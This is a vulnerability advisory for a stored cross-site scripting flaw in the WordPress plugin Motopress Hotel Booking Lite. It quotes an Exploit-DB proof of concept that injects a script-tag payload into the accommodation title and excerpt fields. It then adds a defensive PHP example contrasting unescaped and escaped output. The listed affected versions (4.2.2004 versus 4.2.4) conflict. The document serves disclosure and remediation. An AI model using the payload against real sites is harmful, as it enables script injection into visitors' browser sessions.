vendor: Motopress Hotel Booking Lite
by: Sanjay Singh
CVSS: 8.8 HIGH
Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Motopress Hotel Booking Lite
Affected Version From: 4.2.2004
Affected Version To: 4.2.2004
Patch Exists: YES
Related CWE:
CPE: a:motopress:motopress_hotel_booking_lite
Metasploit:
Other Scripts:
Platforms Tested: Windows/XAMPP
2022

WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – Stored Cross-Site Scripting (XSS)

A stored Cross-Site Scripting (XSS) vulnerability exists in WordPress Plugin Motopress Hotel Booking Lite version 4.2.4. An attacker can inject malicious JavaScript code into the title and excerpt input fields of the 'Add Accommodation Type' page. The input is stored in the database and executed when the page is visited. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

Mitigation:

Update to the latest version of the WordPress Plugin Motopress Hotel Booking Lite.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:

1. Open http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on "Add Accommodation Type".
3. Enter the payload in the title field: "><script>alert("XSS")</script>
4. Enter the payload in the excerpt field: "><script>alert("XSS")</script>
5. Click Publish.
6. Visit http://localhost/accommodations/
7. The XSS payload executes.
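
The flaw class behind the steps above, shown from the defender's side as an added example (not the plugin's code and not part of the original advisory): a hypothetical listing template prints the stored title and excerpt unencoded, then the same template with output encoding and save-time sanitization. The template markup and the function names are assumptions; htmlspecialchars() stands in for WordPress's esc_html() and esc_attr() so the script runs without WordPress.

```php
<?php
// Constructed sample: the value the PoC stores in the title and excerpt.
$payload = '"><script>alert("XSS")</script>';

// Hypothetical listing template (NOT the plugin's code): stored values are
// concatenated into an attribute and into element content without encoding.
function render_unsafe(string $title, string $excerpt): string {
    return '<a class="room" title="' . $title . '">' . $title . '</a>'
         . '<p>' . $excerpt . '</p>';
}

// Output encoding for HTML text and quoted-attribute contexts.
// In WordPress templates the equivalents are esc_html() and esc_attr().
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $title, string $excerpt): string {
    return '<a class="room" title="' . e($title) . '">' . e($title) . '</a>'
         . '<p>' . e($excerpt) . '</p>';
}

// Defence in depth on save: titles and excerpts are plain text, so markup
// is removed before storage (WordPress offers sanitize_text_field()).
function sanitize_plain(string $s): string {
    return trim(strip_tags($s));
}

// Parse the rendered fragment and report whether a real <script> element
// exists in the resulting DOM, which is what a browser would execute.
function has_script_element(string $html): bool {
    libxml_use_internal_errors(true);   // tolerate malformed sample markup
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length > 0;
}

foreach ([
    'unescaped output'        => render_unsafe($payload, $payload),
    'escaped output'          => render_safe($payload, $payload),
    'sanitized, then escaped' => render_safe(sanitize_plain($payload), sanitize_plain($payload)),
] as $label => $html) {
    printf("%-24s script element in DOM: %s\n", $label,
           has_script_element($html) ? 'yes' : 'no');
}
```

Run with the PHP CLI (the DOM extension is required). The same has_script_element() check can be pointed at the rendered accommodations page after updating the plugin to confirm the stored values no longer produce markup.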